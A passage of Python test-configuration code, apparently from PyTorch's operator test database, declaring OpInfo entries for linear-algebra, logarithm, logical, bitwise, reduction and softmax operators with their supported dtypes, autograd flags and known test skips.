aten_name='linalg_matrix_norm', dtypes=floating_and_complex_types(), check_batched_gradgrad=False, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], sample_inputs_func=sample_inputs_linalg_matrix_norm), OpInfo('linalg.qr', aten_name='linalg_qr', op=torch.linalg.qr, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, # In-place ops check_batched_gradgrad=False, sample_inputs_func=sample_inputs_linalg_qr_geqrf, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack]), OpInfo('linalg.slogdet', aten_name='linalg_slogdet', op=torch.linalg.slogdet, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_slogdet, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack]), OpInfo('linalg.vander', aten_name='linalg_vander', ref=np_vander_batched, op=torch.linalg.vander, dtypes=all_types_and_complex(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, sample_inputs_func=sample_inputs_linalg_vander), ReductionOpInfo( 'linalg.vector_norm', op=torch.linalg.vector_norm, identity=0, nan_policy='propagate', supports_multiple_dims=True, complex_to_real=True, supports_forward_ad=True, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients # got: Could not allocate memory to change Tensor SizesAndStrides! 
check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), generate_args_kwargs=sample_kwargs_vector_norm, aten_name='linalg_vector_norm', skips=( DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), )), UnaryUfuncInfo('log', ref=np.log, domain=(0, None), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16, torch.chalf), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 5e-2}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), ), # log(z)->-inf for |z|->0 reference_numerics_filter=NumericsFilter(condition=lambda x: torch.abs(x) < 0.1, safe_val=1)), UnaryUfuncInfo('log10', ref=np.log10, domain=(0, None), decorators=(precisionOverride({torch.bfloat16: 5e-2}),), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), assert_autodiffed=True, dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), ), # log10(z)->-inf for |z|->0 reference_numerics_filter=NumericsFilter(condition=lambda x: torch.abs(x) < 0.1, safe_val=1)), UnaryUfuncInfo('log1p', ref=np.log1p, aliases=('special.log1p',), domain=(-1, None), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), decorators=(precisionOverride({torch.bfloat16: 1e-1}),), skips=( DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True), UnaryUfuncInfo('log2', ref=np.log2, domain=(0, None), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 1e-1}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.cfloat, torch.cdouble]), ), # log2(z)->-inf for |z|->0 reference_numerics_filter=NumericsFilter(condition=lambda x: torch.abs(x) < 0.1, safe_val=1)), BinaryUfuncInfo('ldexp', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_inplace_autograd=False, promotes_int_to_float=True, supports_out=True, supports_rhs_python_scalar=False, skips=( # RuntimeError: mul(): functions with out=... 
arguments don't support # automatic differentiation, but one of the arguments requires grad # https://github.com/pytorch/pytorch/issues/68966 DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_variant_consistency_eager'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), ), decorators=[ DecorateInfo( toleranceOverride({ torch.complex64: tol(atol=1e-05, rtol=1e-05) }), 'TestCommon', device_type='cpu', ), ], ), OpInfo('logaddexp', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.bfloat16), dtypesIfROCM=floating_types_and(torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=lambda op_info, device, dtype, requires_grad=False, **kwargs: (SampleInput(make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), args=(make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad),)),)), OpInfo('logaddexp2', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.bfloat16), dtypesIfROCM=floating_types_and(torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=lambda op_info, device, dtype, requires_grad=False, **kwargs: (SampleInput(make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), args=(make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad),)),)), UnaryUfuncInfo('logical_not', ref=np.logical_not, decorators=(precisionOverride({torch.bfloat16: 7e-1, torch.float16: 5e-1}),), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_autograd=False, skips=( # The function variant always returns BoolTensor # while the inplace variant preserves the input dtype. 
# >>> t = torch.randn(3) # >>> torch.logical_not(t) # tensor([False, False, False]) # >>> torch.logical_not(t).dtype # torch.bool # >>> t.logical_not_().dtype # torch.float32 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_variant_consistency', dtypes=all_types_and_complex_and(torch.half, torch.bfloat16)), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', dtypes=all_types_and_complex_and(torch.half, torch.bfloat16)), )), BinaryUfuncInfo('lt', ref=np.less, aliases=('less',), dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), always_returns_bool=True, supports_autograd=False,), OpInfo('linalg.lu_factor', aten_name='linalg_lu_factor', op=torch.linalg.lu_factor, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_lu, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack]), OpInfo('linalg.lu_factor_ex', aten_name='linalg_lu_factor_ex', op=torch.linalg.lu_factor_ex, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_lu, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack]), OpInfo('linalg.lu', aten_name='linalg_lu', op=torch.linalg.lu, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_lu, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack]), OpInfo('lu_unpack', op=torch.lu_unpack, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=(skipCPUIfNoLapack,), sample_inputs_func=sample_inputs_lu_unpack), OpInfo('lu', op=torch.lu, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_lu, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # we skip jit tests because `lu` is a torch function # RuntimeError: # 'Tensor (inferred)' object has no attribute or method 'lu'.: # File "<string>", line 3 # def the_method(i0): # return i0.lu(True, True) # ~~~~~ <--- HERE DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # RuntimeError not raised: Expected RuntimeError when calling with input.device=cpu and out.device=cuda DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # UserWarning not triggered : Resized a non-empty tensor but did not warn about it. 
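           # For context: out= ops are expected to warn when they resize a non-empty
           # out tensor. A hedged sketch of the convention test_out_warning checks
           # (warning text abbreviated):
           # >>> out = torch.empty(1)
           # >>> torch.add(torch.ones(2), torch.ones(2), out=out)
           # UserWarning: An output with one or more elements was resized ...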
DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), )), OpInfo('lu_solve', op=torch.lu_solve, dtypes=floating_and_complex_types(), check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # See https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_lu_solve, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Tests different backward implementations"), "TestCommon", "test_floating_inputs_are_differentiable"),), ), OpInfo('masked_fill', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), sample_inputs_func=sample_inputs_masked_fill, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, supports_out=False), OpInfo('masked_scatter', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_masked_scatter, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, supports_out=False), OpInfo('masked_select', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_masked_select, error_inputs_func=error_inputs_masked_select), OpInfo('matrix_exp', dtypes=floating_and_complex_types_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), aliases=('linalg.matrix_exp',), sample_inputs_func=sample_inputs_matrix_exp, # Needs to construct a 2nx2n matrix by copy_ ing into it check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), # times out DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), ), supports_out=False, ), OpInfo('matmul', aliases=('linalg.matmul',), dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (SM53OrLater and CUDA11OrLater) or TEST_WITH_ROCM else []), assert_autodiffed=True, assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, sample_inputs_func=sample_inputs_matmul, decorators=[ # NVIDIA only assures that bfloat16 is supported by bmm if SM >= 5.3 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes', device_type='cuda', active_if=not SM53OrLater), # ROCm intermittently fails the test with standard atol/rtol DecorateInfo(toleranceOverride({torch.float32: tol(atol=1e-4, rtol=0)}), 'TestCommon', 'test_noncontiguous_samples', device_type='cuda', active_if=TEST_WITH_ROCM), DecorateInfo(toleranceOverride({torch.float32: tol(atol=1e-4, rtol=0)}), 'TestCommon', 'test_out', 
device_type='cuda', active_if=TEST_WITH_ROCM), # mv for the sample with shapes (S, S, M, M), (M,) has some variance in the # backward on CPU DecorateInfo(toleranceOverride({torch.float32: tol(atol=0, rtol=1e-5)}), 'TestCommon', 'test_noncontiguous_samples', device_type='cpu'), ], skips=( # https://github.com/pytorch/pytorch/issues/67470 DecorateInfo(unittest.skip("67470!"), 'TestCommon', 'test_noncontiguous_samples', device_type='cpu', dtypes=(torch.long,)), # AssertionError: False is not true : Tensors failed to compare as equal! DecorateInfo(unittest.skip("Skipped!"), 'TestOpInfo', device_type='xla', dtypes=(torch.long,)), # https://github.com/pytorch/pytorch/issues/71774 DecorateInfo(unittest.skip('Skipped!'), 'TestNNCOpInfo', 'test_nnc_correctness', device_type='cpu', dtypes=(torch.long,)), )), OpInfo('max', variant_test_name='reduction_with_dim', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), sample_inputs_func=sample_inputs_max_min_reduction_with_dim, supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('max', variant_test_name='reduction_no_dim', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_max_min_reduction_no_dim), OpInfo('median', dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16), # TODO: some signatures of median do support out supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=partial(sample_inputs_reduction, supports_multiple_dims=False)), OpInfo('nanmedian', dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16), # TODO: some signatures of nanmedian do support out supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=partial(sample_inputs_reduction, supports_multiple_dims=False)), OpInfo('var_mean', dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_reduction, supports_multiple_dims=False), backward_dtypes=floating_types_and(torch.half, torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.half), # TODO: some signatures of var_mean do support out supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=False, # Need: var_mean skips=( # var_mean does not support automatic differentiation for outputs with complex dtype DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), # https://github.com/pytorch/pytorch/issues/67539 DecorateInfo(unittest.skip("67539"), 'TestCommon', 'test_noncontiguous_samples', active_if=TEST_WITH_ASAN, device_type='cpu'), # TODO: FIXME: complex inputs requiring grad error in forward DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes'), # TODO: review with var_mean tests in test_autograd.py DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip("Fails on ASAN!"), 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD'), # Division by zero, may be related to above? 
DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_fwgrad_bwgrad'))), OpInfo('std_mean', dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_reduction, supports_multiple_dims=False), backward_dtypes=floating_types_and(torch.half, torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.half), # TODO: some signatures of std_mean do support out supports_out=False, supports_forward_ad=True, # Supports only certain variants? supports_fwgrad_bwgrad=False, # Need: std_mean skips=( DecorateInfo(unittest.skip("ASAN: division by zero!"), active_if=TEST_WITH_ASAN), # std_mean does not support forward when complex inputs require grad DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), # https://github.com/pytorch/pytorch/issues/67539 DecorateInfo(unittest.skip("67539"), 'TestCommon', 'test_noncontiguous_samples', active_if=TEST_WITH_ASAN, device_type='cpu'), # TODO: fix along with var_mean autograd tests DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip("Fails on ASAN!"), 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD'), # Division by zero, may be related to above? DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_fwgrad_bwgrad'))), OpInfo('meshgrid', variant_test_name='variadic_tensors', ref=np.meshgrid, dtypes=all_types_and_complex_and(torch.bfloat16, torch.bool, torch.float16), sample_inputs_func=partial(sample_inputs_meshgrid, variant='variadic'), skips=[ # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":252, # please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # meshgrid is defined in torch.functional to take a # variadic list of tensors. Variadic parameters are not # compatible with the normalize operator tests. DecorateInfo(unittest.skip("Skipped!"), 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # Skip operator schema test because this is a functional and not an operator DecorateInfo(unittest.skip("Skipped!"), 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ], supports_out=False, supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('meshgrid', variant_test_name='list_of_tensors', # Unlike the variant above, we do not use np.meshgrid as a # ref since it does not officially support list of numpy # arrays. dtypes=all_types_and_complex_and(torch.bfloat16, torch.bool, torch.float16), sample_inputs_func=partial(sample_inputs_meshgrid, variant='list'), skips=[ # meshgrid is defined in torch.functional to take a # variadic list of tensors. Variadic parameters are not # compatible with the normalize operator tests. 
DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), ], assert_autodiffed=True, supports_out=False, autodiff_nonfusible_nodes=[], supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('min', variant_test_name='reduction_with_dim', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), sample_inputs_func=sample_inputs_max_min_reduction_with_dim, supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('min', variant_test_name='reduction_no_dim', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_max_min_reduction_no_dim), OpInfo('quantile', dtypes=floating_types(), sample_inputs_func=sample_inputs_reduction_quantile, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), ), # See https://github.com/pytorch/pytorch/issues/66357 # Relies on copy_ to broadcast, but the forward AD path calls broadcast_to which # does not have a batching rule in core check_batched_forward_grad=False), OpInfo('nanquantile', dtypes=floating_types(), sample_inputs_func=sample_inputs_reduction_quantile, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), ), # See https://github.com/pytorch/pytorch/issues/66357 # Relies on copy_ to broadcast, but the forward AD path calls broadcast_to which # does not have a batching rule in core check_batched_forward_grad=False), BinaryUfuncInfo( 'max', aliases=('maximum',), variant_test_name='binary', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, ref=np.maximum, supports_rhs_python_scalar=False, skips=( # Incorrectly attempts to use a scalar for the second argument DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), # TODO: FIXME: RuntimeError: "max_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo( 'maximum', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, ref=np.maximum, supports_rhs_python_scalar=False, skips=( # TODO: FIXME: RuntimeError: "max_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo( 'min', aliases=('minimum',), variant_test_name='binary', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, ref=np.minimum, supports_rhs_python_scalar=False, skips=( # Incorrectly attempts to use a scalar for the second argument DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), # TODO: FIXME: RuntimeError: "min_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo( 'minimum', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), 
supports_forward_ad=True, supports_fwgrad_bwgrad=True, ref=np.minimum, supports_rhs_python_scalar=False, skips=( # TODO: FIXME: RuntimeError: "min_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), ), ), BinaryUfuncInfo('logical_and', ref=np.logical_and, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_autograd=False, always_returns_bool=True, supports_rhs_python_scalar=False), BinaryUfuncInfo('logical_or', ref=np.logical_or, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_autograd=False, always_returns_bool=True, supports_rhs_python_scalar=False), BinaryUfuncInfo('logical_xor', ref=np.logical_xor, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_autograd=False, always_returns_bool=True, supports_rhs_python_scalar=False), BinaryUfuncInfo('bitwise_and', ref=np.bitwise_and, dtypes=integral_types_and(torch.bool), operator_variant=operator.and_, inplace_operator_variant=operator.iand, supports_autograd=False, supports_one_python_scalar=True, skips=( # RuntimeError: "bitwise_and_cuda" not implemented for 'Half' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo('bitwise_or', ref=np.bitwise_or, dtypes=integral_types_and(torch.bool), operator_variant=operator.or_, inplace_operator_variant=operator.ior, supports_autograd=False, supports_one_python_scalar=True, skips=( # TODO: FIXME: RuntimeError: "bitwise_or_cuda" not implemented for 'Half' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo('bitwise_xor', ref=np.bitwise_xor, dtypes=integral_types_and(torch.bool), operator_variant=operator.xor, inplace_operator_variant=operator.ixor, supports_autograd=False, supports_one_python_scalar=True, skips=( # TODO: FIXME: RuntimeError: "bitwise_xor_cuda" not implemented for 'Half' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo('heaviside', ref=lambda a, b: ( # necessary because np.heaviside incorrectly returns float64 when passed args of dtype int64 np.int64(np.heaviside(a, b)) if a.dtype == np.int64 and b.dtype == np.int64 else np.heaviside(a, b) ), dtypes=all_types_and(torch.bool, torch.float16, torch.bfloat16), supports_autograd=False, supports_rhs_python_scalar=False, skips=( # RuntimeError: heaviside is not yet implemented for tensors with different dtypes. 
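                        # A short sketch of the dtype strictness behind these skips (the
                        # values argument must match the input dtype exactly):
                        # >>> torch.heaviside(torch.tensor([-1.0, 0.0, 2.0]), torch.tensor(0.5))
                        # tensor([0.0000, 0.5000, 1.0000])
                        # >>> torch.heaviside(torch.tensor([1.0]), torch.tensor(1))
                        # RuntimeError: heaviside is not yet implemented for tensors with different dtypes.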
                        DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'),
                        # PyTorch's heaviside does not appear to propagate NaNs
                        DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs',
                                     'test_reference_numerics_extremal_values'),
                    )),
    BinaryUfuncInfo('lcm',
                    ref=np.lcm,
                    dtypes=integral_types_and(),
                    supports_autograd=False,
                    supports_rhs_python_scalar=False),
    BinaryUfuncInfo('gcd',
                    ref=np.gcd,
                    dtypes=integral_types_and(),
                    supports_autograd=False,
                    supports_rhs_python_scalar=False,
                    skips=(
                        DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs',
                                     'test_reference_numerics_small_values',
                                     dtypes=(torch.int8,)),)),
    BinaryUfuncInfo('isclose',
                    ref=np.isclose,
                    dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16),
                    sample_inputs_func=sample_inputs_isclose,
                    supports_autograd=False,
                    supports_out=False,
                    supports_rhs_python_scalar=False,
                    skips=(
                        DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_numpy_refs',
                                     dtypes=(torch.complex128,)),
                        # RuntimeError: Short did not match Int
                        DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'),
                        DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs',
                                     'test_reference_numerics_extremal_values'),
                        # Problem due to internal inplace operations
                        DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'),
                    )),
    # `softmax` supports different dtypes based on whether the `dtype` argument
    # is passed or not. Hence two OpInfo entries, one with dtype and the other without.
    # https://github.com/pytorch/pytorch/issues/68752
    OpInfo('softmax',
           aliases=('special.softmax', 'nn.functional.softmax',),
           aten_name='softmax',
           aten_backward_name='_softmax_backward_data',
           dtypes=floating_types_and(torch.bfloat16),
           dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16),
           sample_inputs_func=sample_inputs_softmax_variant,
           assert_jit_shape_analysis=True,
           assert_autodiffed=True,
           supports_forward_ad=True,
           supports_out=True),
    OpInfo('softmax',
           aliases=('special.softmax', 'nn.functional.softmax',),
           variant_test_name="with_dtype",
           aten_name='softmax',
           dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16),
           sample_inputs_func=partial(sample_inputs_softmax_variant, with_dtype=True),
           assert_autodiffed=True,
           supports_forward_ad=True,
           supports_out=True),
    # `softmin` supports different dtypes based on whether the `dtype` argument
    # is passed or not. Hence two OpInfo entries, one with dtype and the other without.
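    # A brief sketch of the two call patterns (the output dtype follows the input
    # unless dtype= is passed, in which case the input is converted first):
    # >>> x = torch.ones(2, dtype=torch.bfloat16)
    # >>> torch.nn.functional.softmin(x, dim=0).dtype
    # torch.bfloat16
    # >>> torch.nn.functional.softmin(x, dim=0, dtype=torch.float32).dtype
    # torch.float32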
# https://github.com/pytorch/pytorch/issues/68752 OpInfo('nn.functional.softmin', aten_name='softmin', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_softmax_variant, assert_jit_shape_analysis=False, assert_autodiffed=False, supports_forward_ad=True, supports_out=False), OpInfo('nn.functional.softmin', variant_test_name="with_dtype", aten_name='softmin', dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), sample_inputs_func=partial(sample_inputs_softmax_variant, with_dtype=True), assert_autodiffed=False, supports_forward_ad=True, supports_out=False), OpInfo( "nn.functional.cross_entropy", dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_cross_entropy, supports_out=False, supports_forward_ad=True, decorators=( DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-5, rtol=1e-3)}), "TestJit", "test_variant_consistency_jit", device_type="cpu", ), ), skips=( # AssertionError: False is not true : Scalars failed to compare as equal! 0 != 1536 # test_ops.TestJitCUDA.test_variant_consistency_jit_nn_functional_cross_entropy_cuda_float32 leaked # 1536 bytes CUDA memory on device 0 DecorateInfo( unittest.expectedFailure, "TestJit", "test_variant_consistency_jit", device_type="cuda", ), ) ), OpInfo('nn.functional.normalize', dtypes=floating_and_complex_types_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_normalize, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( 